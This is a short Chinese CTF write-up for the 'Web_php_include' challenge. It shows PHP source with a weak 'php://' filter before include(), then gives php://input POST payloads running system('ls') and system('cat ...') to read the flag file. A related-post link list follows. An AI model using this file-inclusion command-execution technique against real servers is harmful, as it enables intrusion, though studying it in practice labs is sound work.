Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
wgego15 小时前
Polar靶场web 随写笔记
笔记·web
白帽子黑客杰哥16 小时前
CTF Web题目常用考点与解题技巧合集
前端·数据库·web安全·网络安全·ctf·信息收集
曲幽17 小时前
Flask 应用部署实战:Nginx 反向代理配置指南
python·nginx·web·gunicorn·wsgi
小白勇闯网安圈17 小时前
wife_wife、题目名称-文件包含、FlatScience
javascript·python·网络安全·web·原型模式
码农12138号1 天前
Bugku HackINI 2022 Whois 详解
linux·web安全·ctf·命令执行·bugku·换行符
三七吃山漆1 天前
攻防世界——comment
android·python·web安全·网络安全·ctf
码农12138号1 天前
Bugku - 2023 HackINI Upload0 与 2023 HackINI Upload1 详解
web安全·php·ctf·文件上传漏洞·bugku
clown_YZ2 天前
CERTUNLP 2025--部分解题记录
网络安全·ctf
曲幽2 天前
Flask核心技能:从零上手视图函数
python·json·app·web·get·post·request·response
0和1的舞者2 天前
《Spring Bean&DI 通关笔记:从定义到注入的全场景避坑指南》
java·开发语言·学习·spring·ioc·di·web